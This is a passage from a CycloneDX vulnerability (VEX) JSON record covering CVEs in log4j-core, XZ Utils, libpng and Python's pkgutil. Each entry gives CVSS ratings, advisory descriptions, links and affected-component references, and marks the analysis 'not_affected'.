"urn:cdx:34e5c353-2a48-4fe2-805f-8f192280376d/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:ba2db0a6-0fda-4646-81f2-1b48896717af/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#877d9d1d-fc8f-4f9a-b205-469c5e476b2f" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#100d6984-23b7-456d-909e-92d446e27215" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#14e63e16-df36-4967-b7bd-97a9e0390547" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#10bcd395-25b6-42df-b273-867e13af25a6" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#1bf7fbab-1eef-4ecc-9894-2bc1acca0d53" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#1536cbff-3e84-4de1-b397-a7aeacdb5acb" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#60ddf8ad-1ef4-4cee-b11e-358cec665628" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#1c094c38-b147-4b75-9289-76a63854c096" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#98e964de-92a5-4e0c-8f37-b9c17abe105b" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#97ccea6a-0b52-4fec-85e6-3243f3bc4d50" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#74f558d6-4ba0-4638-8162-7601ddca836b" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#11208862-2643-4e52-9c00-cec8b793226d" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#12856278-bcf7-4546-b5a0-f3dafe12482a" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-34480", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "cwes": [ 116 ], "description": "Apache Log4j Core's XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification https://www.w3.org/TR/xml/#charsets producing invalid XML output whenever a log message or MDC value contains such characters.\n\nThe impact depends on the StAX implementation in use:\n\n * JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records.\n * Alternative StAX implementations (e.g., Woodstox https://github.com/FasterXML/woodstox , a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger.\n\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output.", "recommendation": "Upgrade org.apache.logging.log4j:log4j-core to version 2.25.4", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-34480" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/10/9" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-34480" }, { "url": "https://github.com/apache/logging-log4j2" }, { "url": "https://github.com/apache/logging-log4j2/pull/4077" }, { "url": "https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb" }, { "url": "https://logging.apache.org/cyclonedx/vdr.xml" }, { "url": "https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout" }, { "url": "https://logging.apache.org/security.html#CVE-2026-34480" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34480" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-34480" } ], "published": "2026-04-10T16:16:31+00:00", "updated": "2026-04-24T18:21:54+00:00", "affects": [ { "ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3", "versions": [ { "version": "2.25.3", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2dfaebb4-9f04-4dd0-b2fb-defc1c1f105e" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1cca19b0-a551-47f4-9f36-4719edf318a9" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:b5054fdf-8701-40fa-bada-ab5917185205/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:1e59dc1b-6b11-4d3e-80e8-4b1d3b1a2992/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#3d43a983-2b98-4c6a-872f-d8b5546c19ce" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#081fb987-b17a-46d9-909c-c15f0f57e16f" }, { "ref": "urn:cdx:34e5c353-2a48-4fe2-805f-8f192280376d/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:ba2db0a6-0fda-4646-81f2-1b48896717af/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#877d9d1d-fc8f-4f9a-b205-469c5e476b2f" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#100d6984-23b7-456d-909e-92d446e27215" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#14e63e16-df36-4967-b7bd-97a9e0390547" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#10bcd395-25b6-42df-b273-867e13af25a6" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#1bf7fbab-1eef-4ecc-9894-2bc1acca0d53" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#1536cbff-3e84-4de1-b397-a7aeacdb5acb" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#60ddf8ad-1ef4-4cee-b11e-358cec665628" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#1c094c38-b147-4b75-9289-76a63854c096" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#98e964de-92a5-4e0c-8f37-b9c17abe105b" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#97ccea6a-0b52-4fec-85e6-3243f3bc4d50" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#74f558d6-4ba0-4638-8162-7601ddca836b" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#11208862-2643-4e52-9c00-cec8b793226d" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#12856278-bcf7-4546-b5a0-f3dafe12482a" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-34743", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "cwes": [ 122 ], "description": "XZ Utils provide a general-purpose data-compression library plus command-line tools. Prior to version 5.8.3, if lzma_index_decoder() was used to decode an Index that contained no Records, the resulting lzma_index was left in a state where where a subsequent lzma_index_append() would allocate too little memory, and a buffer overflow would occur. This issue has been patched in version 5.8.3.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-34743" }, { "url": "http://www.openwall.com/lists/oss-security/2026/03/31/13" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-34743" }, { "url": "https://github.com/tukaani-project/xz/commit/c8c22869e780ff57c96b46939c3d79ff99395f87" }, { "url": "https://github.com/tukaani-project/xz/releases/tag/v5.8.3" }, { "url": "https://github.com/tukaani-project/xz/security/advisories/GHSA-x872-m794-cxhv" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34743" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-34743" } ], "published": "2026-04-02T19:21:33+00:00", "updated": "2026-04-15T17:33:17+00:00", "affects": [ { "ref": "pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "5.2.5-8.el9_0", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-34757", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4.4, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 416 ], "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.0.9 to before 1.6.57, passing a pointer obtained from png_get_PLTE, png_get_tRNS, or png_get_hIST back into the corresponding setter on the same png_struct/png_info pair causes the setter to read from freed memory and copy its contents into the replacement buffer. The setter frees the internal buffer before copying from the caller-supplied pointer, which now dangles. The freed region may contain stale data (producing silently corrupted chunk metadata) or data from subsequent heap allocations (leaking unrelated heap contents into the chunk struct). This vulnerability is fixed in 1.6.57.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-34757" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-34757" }, { "url": "https://github.com/pnggroup/libpng/commit/398cbe3df03f4e11bb031e07f416dfdde3684e8a" }, { "url": "https://github.com/pnggroup/libpng/commit/55d20aaa322c9274491cda82c5cd4f99b48c6bcc" }, { "url": "https://github.com/pnggroup/libpng/issues/836" }, { "url": "https://github.com/pnggroup/libpng/issues/837" }, { "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-6fr7-g8h7-v645" }, { "url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00017.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34757" }, { "url": "https://ubuntu.com/security/notices/USN-8251-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-34757" } ], "published": "2026-04-09T15:16:11+00:00", "updated": "2026-05-09T11:16:26+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.6.37-12.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-3479", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], "cwes": [ 22 ], "description": "DISPUTED: The project has clarified that the documentation was incorrect, and that pkgutil.get_data() has the same security model as open(). The documentation has been updated to clarify this point. There is no vulnerability in the function if following the intended security model.\n\npkgutil.get_data() did not validate the resource argument as documented, allowing path traversals.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-3479" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-3479" }, { "url": "https://github.com/python/cpython/commit/5af6ce3e7b643a30a02d22245c1e3f4a8bc0a1fe" }, { "url": "https://github.com/python/cpython/commit/bcdf231946b1da8bdfbab4c05539bb0cc964a1c7" }, { "url": "https://github.com/python/cpython/commit/cf59bf76470f3d75ad47d80ffb8ce76b64b5e943" }, { "url": "https://github.com/python/cpython/commit/d786d59a8f7196bb630100a869f28ad13436b59c" }, { "url": "https://github.com/python/cpython/issues/146121" }, { "url": "https://github.com/python/cpython/pull/146122" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/WYLLVQOOCKGK73JM7Z7ZSNOJC4N7BAWY/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3479" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-3479" } ], "published": "2026-03-18T19:16:06+00:00", "updated": "2026-04-07T18:16:46+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": 